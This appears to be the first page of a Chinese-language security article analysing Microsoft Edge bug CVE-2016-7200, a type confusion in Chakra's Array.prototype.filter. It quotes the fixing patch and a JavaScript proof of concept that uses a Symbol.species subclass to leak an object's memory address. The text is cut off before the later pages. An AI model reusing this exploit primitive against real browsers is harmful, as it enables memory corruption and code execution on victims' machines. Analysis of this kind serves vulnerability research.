欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Windows 10 x64 Edge CVE-2016-7200 & CVE-2016-7201漏洞分析及利用

来源:本站整理 作者:佚名 时间:2017-05-21 TAG: 我要投稿

1. 分析环境

操作系统:Windows 10 x64 专业版 10.0.14393 浏览器:Microsoft Edge x64 38.14393.0

2. CVE-2016-7200分析

这是发生在 JavascriptArray::FilterHelper 中,由于类型混淆所导致的漏洞,先看commit

template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
     { if (args.Info.Count < 2 || !JavascriptConversion::IsCallable(args[1]))
         {
             JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u("Array.prototype.filter"));
         }
 
         RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var thisArg = nullptr; if (args.Info.Count > 2)
         {
             thisArg = args[2];
         } else {
             thisArg = scriptContext->GetLibrary()->GetUndefined();
          } // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object. -        RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);
 +        bool isBuiltinArrayCtor = true;
 +        RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext, nullptr, nullptr, &isBuiltinArrayCtor);
          JavascriptArray* newArr = nullptr; if (newObj == nullptr)
         {
             newArr = scriptContext->GetLibrary()->CreateArray(0);
             newArr->EnsureHead<Var>();
             newObj = newArr;
         } else { // If the new object we created is an array, remember that as it will save us time setting properties in the object below if (JavascriptArray::Is(newObj))
              {
 +#if ENABLE_COPYONACCESS_ARRAY +                JavascriptLibrary::CheckAndConvertCopyOnAccessNativeIntArray<Var>(newObj);
 +#endif newArr = JavascriptArray::FromVar(newObj);
              }
          } Var element = nullptr; Var selected = nullptr; if (pArr)
         {
             Assert(length <= MaxArrayLength);
             uint32 i = 0; for (uint32 k = 0; k < length; k++)
             { if (!pArr->DirectGetItemAtFull(k, &element))
                 { continue;
                 }
 
                 selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), thisArg,
                     element,
                     JavascriptNumber::ToVar(k, scriptContext),
                     pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
                  { // Try to fast path if the return object is an array - if (newArr)
 + if (newArr && isBuiltinArrayCtor)
                      {
                          newArr->DirectSetItemAt(i, element);
                      }

再看下POC

var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice(); var [hi, lo] = PutDataAndGetAddr(x); function PutDataAndGetAddr(t) { var d = new Array(1,2,3); class dummy { constructor() { return d;
        }
    } class MyArray extends Array { static get [Symbol.species]() { return dummy;
        }
    } var a = new Array({}, t, "theori", 7, 7, 7, 7, 7); function test(i) { return true;
    }

    a.__proto__ = MyArray.prototype; var o = a.filter(test); var h = []; for (item in o) { var n = new Number(o[item]); if (n < 0) {
            n = n + 0x100000000;
        }
        h.push(n);
    } return [h[3], h[2]];
}

[1] [2] [3] [4] [5] [6]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载